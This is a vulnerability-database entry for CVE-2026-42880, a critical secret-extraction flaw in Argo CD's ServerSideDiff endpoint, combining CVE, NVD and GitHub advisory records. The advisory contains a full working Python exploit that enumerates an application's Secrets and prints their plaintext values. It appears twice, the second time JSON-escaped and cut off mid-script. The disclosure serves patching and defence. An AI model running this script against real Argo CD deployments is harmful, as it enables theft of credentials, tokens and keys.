Vulnerability-Lookup

CVE-2026-42880 (GCVE-0-2026-42880)

Vulnerability from cvelistv5 – Published: 2026-05-07 22:20 – Updated: 2026-05-08 13:06

Title

ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction

Summary

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9.

Severity ?

9.6 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Assigner

GitHub_M

References

URL

Tags

https://github.com/argoproj/argo-cd/security/advi…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	argoproj	argo-cd	Affected: >= 3.2.0, < 3.2.11 Affected: >= 3.3.0, < 3.3.9

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42880",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-08T13:06:33.203796Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-08T13:06:55.113Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "argo-cd",
          "vendor": "argoproj",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.2.0, \u003c 3.2.11"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.3.0, \u003c 3.3.9"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-212",
              "description": "CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-07T22:20:39.506Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
        }
      ],
      "source": {
        "advisory": "GHSA-3v3m-wc6v-x4x3",
        "discovery": "UNKNOWN"
      },
      "title": "ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42880",
    "datePublished": "2026-05-07T22:20:39.506Z",
    "dateReserved": "2026-04-30T18:49:06.711Z",
    "dateUpdated": "2026-05-08T13:06:55.113Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42880",
      "date": "2026-05-10",
      "epss": "0.00031",
      "percentile": "0.08886"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42880\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-07T23:16:32.450\",\"lastModified\":\"2026-05-08T16:08:15.570\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N\",\"baseScore\":9.6,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":5.8}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-212\"}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42880\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-08T13:06:33.203796Z\"}}}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-08T13:06:50.353Z\"}}], \"cna\": {\"title\": \"ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction\", \"source\": {\"advisory\": \"GHSA-3v3m-wc6v-x4x3\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-cd\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.2.0, \u003c 3.2.11\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.3.0, \u003c 3.3.9\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3\", \"name\": \"https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-212\", \"description\": \"CWE-212: Improper Removal of Sensitive Information Before Storage or Transfer\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-07T22:20:39.506Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42880\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-08T13:06:55.113Z\", \"dateReserved\": \"2026-04-30T18:49:06.711Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-07T22:20:39.506Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-42880

Vulnerability from fkie_nvd - Published: 2026-05-07 23:16 - Updated: 2026-05-08 16:08

Severity ?

9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9."
    }
  ],
  "id": "CVE-2026-42880",
  "lastModified": "2026-05-08T16:08:15.570",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 5.8,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-07T23:16:32.450",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-212"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-3V3M-WC6V-X4X3

Vulnerability from github – Published: 2026-05-07 01:56 – Updated: 2026-05-07 01:56

Summary

ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction

Details

Summary

There is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism.

Details

Argo CD masks Secret data in every endpoint that returns Kubernetes resource state except one. All the other endpoints such as GetManifests, GetManifestsWithFiles, GetResource and PatchResource utilize hideSecretData() to mask the returned secret value. The vulnerable function ServerSideDiff gRPC/REST endpoint (/application.ApplicationService/ServerSideDiff) constructs its response with raw, unmasked PredictedLive and NormalizedLive states:

// server/application/application.go:3051-3062
responseDiffs = append(responseDiffs, &v1alpha1.ResourceDiff{
    TargetState:     string(diffRes.PredictedLive),
    LiveState:       string(diffRes.NormalizedLive),
})

A user only requires RBAC to call this ServerSideDiff function. Every authenticated Argo CD user has get access via the default role:catch-all policy. However, Argo CD has a defense layer called removeWebhookMutation() that normally strips non-Argo CD-managed fields from the Server Side Apply (SSA) dry-run response and merges them with the client-provided (masked) live state. This prevents real Secret values from leaking through the diff. However, this defense is entirely skipped when the Application has the annotation argocd.argoproj.io/compare-options: IncludeMutationWebhook=true. When IncludeMutationWebhook=true is set, ignoreMutationWebhook becomes false, and the defense is skipped entirely:

if o.ignoreMutationWebhook {
    predictedLive, err = removeWebhookMutation(predictedLive, live, o.gvkParser, o.manager)
}

The raw Kubernetes SSA dry-run response which contains real Secret values read from etcd is then flown directly into the API response with no masking.

When ServerSideDiff is called, the handler invokes K8sServerSideDryRunner.Run(), which performs the equivalent of:

kubectl apply --server-side --dry-run=server --field-manager=argocd-controller For extraction to succeed, the Secret's data fields must be owned by at least one non-Argo CD SSA field manager. When argocd-controller is the sole field manager for data, the SSA dry-run garbage-collects those fields (since the target manifest omits them). When a second manager exists (e.g., kube-controller-manager), that manager retains ownership and the real values survive in the response.

PoC

#!/usr/bin/env python3
"""
Argo CD ServerSideDiff Secret Extraction PoC

Usage:
    python3 poc.py <host> <token> <app> <project>

Example:
    python3 poc.py argocd.int.<customer>.com eyJhbG... my-app my-project
"""

import base64
import http.client
import json
import ssl
import struct
import sys
import urllib.parse
from collections import defaultdict

def encode_varint(v):
    out = []
    while v > 0x7f:
        out.append((v & 0x7f) | 0x80)
        v >>= 7
    out.append(v & 0x7f)
    return bytes(out)

def encode_str(field, val):
    tag = (field << 3) | 2
    raw = val.encode()
    return encode_varint(tag) + encode_varint(len(raw)) + raw

def encode_bytes(field, val):
    tag = (field << 3) | 2
    return encode_varint(tag) + encode_varint(len(val)) + val

def encode_bool(field, val):
    tag = (field << 3) | 0
    return encode_varint(tag) + encode_varint(1 if val else 0)

def decode_varint(data, pos):
    val, shift = 0, 0
    while pos < len(data):
        b = data[pos]; pos += 1
        val |= (b & 0x7f) << shift; shift += 7
        if not (b & 0x80):
            break
    return val, pos

def decode_fields(data):
    fields = defaultdict(list)
    pos = 0
    while pos < len(data):
        tag, pos = decode_varint(data, pos)
        wtype = tag & 0x07
        if wtype == 0:
            val, pos = decode_varint(data, pos)
            fields[tag >> 3].append(val)
        elif wtype == 2:
            length, pos = decode_varint(data, pos)
            fields[tag >> 3].append(data[pos:pos + length])
            pos += length
        elif wtype == 5:
            fields[tag >> 3].append(data[pos:pos + 4]); pos += 4
        elif wtype == 1:
            fields[tag >> 3].append(data[pos:pos + 8]); pos += 8
        else:
            break
    return dict(fields)


# -- grpc-web framing --

def grpc_frame(payload):
    return b"\x00" + struct.pack(">I", len(payload)) + payload

def decode_grpc_frames(data):
    frames, pos = [], 0
    while pos + 5 <= len(data):
        flag = data[pos]
        length = struct.unpack(">I", data[pos+1:pos+5])[0]
        pos += 5
        frames.append((flag, data[pos:pos+length]))
        pos += length
    return frames


# -- http helpers --

def make_conn(host):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)

def rest_get(conn, path, token):
    conn.request("GET", path, headers={
        "Authorization": "Bearer " + token,
        "Accept": "application/json",
    })
    resp = conn.getresponse()
    body = resp.read()
    if resp.status != 200:
        return None, "HTTP %d" % resp.status
    return json.loads(body), None

def grpc_post(conn, token, payload):
    conn.request("POST", "/application.ApplicationService/ServerSideDiff",
        body=grpc_frame(payload), headers={
            "Content-Type": "application/grpc-web+proto",
            "Accept": "application/grpc-web+proto",
            "X-Grpc-Web": "1",
            "Authorization": "Bearer " + token,
        })
    resp = conn.getresponse()
    raw = resp.read()
    if resp.status != 200:
        return None, "HTTP %d" % resp.status
    frames = decode_grpc_frames(raw)
    for flag, fdata in frames:
        if flag == 0:
            return fdata, None
    return None, "no data frame in response"


# -- main --

def main():
    if len(sys.argv) != 5:
        print("Usage: python3 poc.py <host> <token> <app> <project>")
        sys.exit(1)

    host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
    conn = make_conn(host)

    # step 1: list managed resources for the app, find secrets
    print("[*] Fetching managed resources for %s/%s ..." % (project, app_name))
    data, err = rest_get(conn, "/api/v1/applications/%s/managed-resources" % urllib.parse.quote(app_name), token)
    if err:
        print("[-] Failed: %s" % err); sys.exit(1)

    secrets = []
    for r in data.get("items", []):
        if r.get("kind") != "Secret":
            continue
        name = r.get("name", "")
        ns = r.get("namespace", "")
        live = r.get("liveState", "")
        stype = "Opaque"
        if live and live != "null":
            try:
                stype = json.loads(live).get("type", "Opaque")
            except Exception:
                pass
        secrets.append((name, ns, stype, live))

    if not secrets:
        print("[-] No secrets found in managed resources"); sys.exit(0)
    print("[+] Found %d secrets" % len(secrets))

    # step 2: call ServerSideDiff for each secret
    total_extracted = 0
    for sname, sns, stype, live_json in secrets:
        # build minimal target manifest (no data field)
        target = {"apiVersion": "v1", "kind": "Secret",
                  "metadata": {"name": sname, "namespace": sns},
                  "type": stype}

        # copy required annotations from live state for SA tokens
        if live_json and live_json != "null":
            try:
                live_annots = json.loads(live_json).get("metadata", {}).get("annotations", {})
                k8s_annots = {k: v for k, v in live_annots.items() if k.startswith("kubernetes.io/")}
                if k8s_annots:
                    target["metadata"]["annotations"] = k8s_annots
            except Exception:
                pass

        # for TLS secrets, include required placeholder keys
        if stype == "kubernetes.io/tls":
            target["data"] = {
                "tls.crt": base64.b64encode(b"PLACEHOLDER").decode(),
                "tls.key": base64.b64encode(b"PLACEHOLDER").decode(),
            }
        elif stype == "kubernetes.io/dockerconfigjson":
            target["data"] = {".dockerconfigjson": base64.b64encode(b'{"auths":{}}').decode()}

        # encode the grpc request
        lr = b""
        lr += encode_str(2, "Secret")       # kind
        lr += encode_str(3, sns)             # namespace
        lr += encode_str(4, sname)           # name
        if live_json:
            lr += encode_str(6, live_json)   # liveState
        lr += encode_bool(12, True)          # modified

        query = encode_str(1, app_name)
        query += encode_str(3, project)
        query += encode_bytes(4, lr)
        query += encode_str(5, json.dumps(target))

        # reconnect for each call (simple, no pool needed for poc)
        try:
            conn = make_conn(host)
            resp_data, err = grpc_post(conn, token, query)
        except Exception as e:
            print("  [!] %s/%s: %s" % (sns, sname, e))
            continue
        if err:
            print("  [!] %s/%s: %s" % (sns, sname, err))
            continue

        # parse response
        resp_fields = decode_fields(resp_data)
        for item_bytes in resp_fields.get(1, []):
            if not isinstance(item_bytes, bytes):
                continue
            ifields = decode_fields(item_bytes)

            # field 5 = targetState (predictedLive — has real values from etcd)
            for raw in ifields.get(5, []):
                if not isinstance(raw, bytes):
                    continue
                try:
                    obj = json.loads(raw)
                except Exception:
                    continue
                if obj.get("kind") != "Secret":
                    continue
                secret_data = obj.get("data", {})
                if not secret_data:
                    continue

                # check for real (non-masked) values
                real_keys = {}
                for k, v in secret_data.items():
                    if not v:
                        continue
                    if all(c == "+" for c in v):
                        continue  # masked by argocd
                    try:
                        decoded = base64.b64decode(v)
                        text = decoded.decode("utf-8", errors="replace")
                    except Exception:
                        continue
                    if all(c == "+" for c in text) and text:
                        continue  # masked (base64 of +++...)
                    real_keys[k] = text

                if real_keys:
                    total_extracted += 1
                    print("\n  [***] %s/%s  (%s)" % (sns, sname, stype))
                    print("        %d/%d keys extracted:" % (len(real_keys), len(secret_data)))
                    for k in sorted(real_keys):
                        v = real_keys[k].replace("\n", "\\n")
                        if len(v) > 120:
                            v = v[:120] + "..."
                        print("          %s: %s" % (k, v))

    print("\n[*] Done. %d secrets with real values extracted." % total_extracted)

if __name__ == "__main__":
    main()

Impact

Any user with Argo CD application get permissions can extract real Kubernetes Secret values including service account tokens, TLS certificates, database credentials, and API keys. On Applications where IncludeMutationWebhook=true is already set, exploitation requires only read-only Argo CD access.

Severity ?

9.6 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "3.2.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.3.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42880"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-212"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T01:56:53Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThere is a missing authorization and data-masking gap in Argo CD\u0027s ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server\u0027s Server-Side Apply dry-run mechanism.\n\n### Details\nArgo CD masks Secret data in every endpoint that returns Kubernetes resource state except one. All the other endpoints such as GetManifests, GetManifestsWithFiles, GetResource and PatchResource utilize hideSecretData() to mask the returned secret value. The vulnerable function ServerSideDiff gRPC/REST endpoint (/application.ApplicationService/ServerSideDiff) constructs its response with raw, unmasked PredictedLive and NormalizedLive states:\n\n```\n// server/application/application.go:3051-3062\nresponseDiffs = append(responseDiffs, \u0026v1alpha1.ResourceDiff{\n    TargetState:     string(diffRes.PredictedLive),\n    LiveState:       string(diffRes.NormalizedLive),\n})\n```\n\nA user only requires RBAC to call this ServerSideDiff function. Every authenticated Argo CD user has get access via the default role:catch-all policy. However, Argo CD has a defense layer called removeWebhookMutation() that normally strips non-Argo CD-managed fields from the Server Side Apply (SSA) dry-run response and merges them with the client-provided (masked) live state. This prevents real Secret values from leaking through the diff. However, this defense is entirely skipped when the Application has the annotation argocd.argoproj.io/compare-options: IncludeMutationWebhook=true.\nWhen IncludeMutationWebhook=true is set, ignoreMutationWebhook becomes false, and the defense is skipped entirely:\n\n```\nif o.ignoreMutationWebhook {\n    predictedLive, err = removeWebhookMutation(predictedLive, live, o.gvkParser, o.manager)\n}\n```\n\nThe raw Kubernetes SSA dry-run response which contains real Secret values read from etcd is then flown directly into the API response with no masking.\n\nWhen ServerSideDiff is called, the handler invokes K8sServerSideDryRunner.Run(), which performs the equivalent of:\n\n`kubectl apply --server-side --dry-run=server --field-manager=argocd-controller\n`\nFor extraction to succeed, the Secret\u0027s data fields must be owned by at least one non-Argo CD SSA field manager. When argocd-controller is the sole field manager for data, the SSA dry-run garbage-collects those fields (since the target manifest omits them). When a second manager exists (e.g., kube-controller-manager), that manager retains ownership and the real values survive in the response.\n\n### PoC\n```\n#!/usr/bin/env python3\n\"\"\"\nArgo CD ServerSideDiff Secret Extraction PoC\n\nUsage:\n    python3 poc.py \u003chost\u003e \u003ctoken\u003e \u003capp\u003e \u003cproject\u003e\n\nExample:\n    python3 poc.py argocd.int.\u003ccustomer\u003e.com eyJhbG... my-app my-project\n\"\"\"\n\nimport base64\nimport http.client\nimport json\nimport ssl\nimport struct\nimport sys\nimport urllib.parse\nfrom collections import defaultdict\n\ndef encode_varint(v):\n    out = []\n    while v \u003e 0x7f:\n        out.append((v \u0026 0x7f) | 0x80)\n        v \u003e\u003e= 7\n    out.append(v \u0026 0x7f)\n    return bytes(out)\n\ndef encode_str(field, val):\n    tag = (field \u003c\u003c 3) | 2\n    raw = val.encode()\n    return encode_varint(tag) + encode_varint(len(raw)) + raw\n\ndef encode_bytes(field, val):\n    tag = (field \u003c\u003c 3) | 2\n    return encode_varint(tag) + encode_varint(len(val)) + val\n\ndef encode_bool(field, val):\n    tag = (field \u003c\u003c 3) | 0\n    return encode_varint(tag) + encode_varint(1 if val else 0)\n\ndef decode_varint(data, pos):\n    val, shift = 0, 0\n    while pos \u003c len(data):\n        b = data[pos]; pos += 1\n        val |= (b \u0026 0x7f) \u003c\u003c shift; shift += 7\n        if not (b \u0026 0x80):\n            break\n    return val, pos\n\ndef decode_fields(data):\n    fields = defaultdict(list)\n    pos = 0\n    while pos \u003c len(data):\n        tag, pos = decode_varint(data, pos)\n        wtype = tag \u0026 0x07\n        if wtype == 0:\n            val, pos = decode_varint(data, pos)\n            fields[tag \u003e\u003e 3].append(val)\n        elif wtype == 2:\n            length, pos = decode_varint(data, pos)\n            fields[tag \u003e\u003e 3].append(data[pos:pos + length])\n            pos += length\n        elif wtype == 5:\n            fields[tag \u003e\u003e 3].append(data[pos:pos + 4]); pos += 4\n        elif wtype == 1:\n            fields[tag \u003e\u003e 3].append(data[pos:pos + 8]); pos += 8\n        else:\n            break\n    return dict(fields)\n\n\n# -- grpc-web framing --\n\ndef grpc_frame(payload):\n    return b\"\\x00\" + struct.pack(\"\u003eI\", len(payload)) + payload\n\ndef decode_grpc_frames(data):\n    frames, pos = [], 0\n    while pos + 5 \u003c= len(data):\n        flag = data[pos]\n        length = struct.unpack(\"\u003eI\", data[pos+1:pos+5])[0]\n        pos += 5\n        frames.append((flag, data[pos:pos+length]))\n        pos += length\n    return frames\n\n\n# -- http helpers --\n\ndef make_conn(host):\n    ctx = ssl.create_default_context()\n    ctx.check_hostname = False\n    ctx.verify_mode = ssl.CERT_NONE\n    return http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)\n\ndef rest_get(conn, path, token):\n    conn.request(\"GET\", path, headers={\n        \"Authorization\": \"Bearer \" + token,\n        \"Accept\": \"application/json\",\n    })\n    resp = conn.getresponse()\n    body = resp.read()\n    if resp.status != 200:\n        return None, \"HTTP %d\" % resp.status\n    return json.loads(body), None\n\ndef grpc_post(conn, token, payload):\n    conn.request(\"POST\", \"/application.ApplicationService/ServerSideDiff\",\n        body=grpc_frame(payload), headers={\n            \"Content-Type\": \"application/grpc-web+proto\",\n            \"Accept\": \"application/grpc-web+proto\",\n            \"X-Grpc-Web\": \"1\",\n            \"Authorization\": \"Bearer \" + token,\n        })\n    resp = conn.getresponse()\n    raw = resp.read()\n    if resp.status != 200:\n        return None, \"HTTP %d\" % resp.status\n    frames = decode_grpc_frames(raw)\n    for flag, fdata in frames:\n        if flag == 0:\n            return fdata, None\n    return None, \"no data frame in response\"\n\n\n# -- main --\n\ndef main():\n    if len(sys.argv) != 5:\n        print(\"Usage: python3 poc.py \u003chost\u003e \u003ctoken\u003e \u003capp\u003e \u003cproject\u003e\")\n        sys.exit(1)\n\n    host, token, app_name, project = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]\n    conn = make_conn(host)\n\n    # step 1: list managed resources for the app, find secrets\n    print(\"[*] Fetching managed resources for %s/%s ...\" % (project, app_name))\n    data, err = rest_get(conn, \"/api/v1/applications/%s/managed-resources\" % urllib.parse.quote(app_name), token)\n    if err:\n        print(\"[-] Failed: %s\" % err); sys.exit(1)\n\n    secrets = []\n    for r in data.get(\"items\", []):\n        if r.get(\"kind\") != \"Secret\":\n            continue\n        name = r.get(\"name\", \"\")\n        ns = r.get(\"namespace\", \"\")\n        live = r.get(\"liveState\", \"\")\n        stype = \"Opaque\"\n        if live and live != \"null\":\n            try:\n                stype = json.loads(live).get(\"type\", \"Opaque\")\n            except Exception:\n                pass\n        secrets.append((name, ns, stype, live))\n\n    if not secrets:\n        print(\"[-] No secrets found in managed resources\"); sys.exit(0)\n    print(\"[+] Found %d secrets\" % len(secrets))\n\n    # step 2: call ServerSideDiff for each secret\n    total_extracted = 0\n    for sname, sns, stype, live_json in secrets:\n        # build minimal target manifest (no data field)\n        target = {\"apiVersion\": \"v1\", \"kind\": \"Secret\",\n                  \"metadata\": {\"name\": sname, \"namespace\": sns},\n                  \"type\": stype}\n\n        # copy required annotations from live state for SA tokens\n        if live_json and live_json != \"null\":\n            try:\n                live_annots = json.loads(live_json).get(\"metadata\", {}).get(\"annotations\", {})\n                k8s_annots = {k: v for k, v in live_annots.items() if k.startswith(\"kubernetes.io/\")}\n           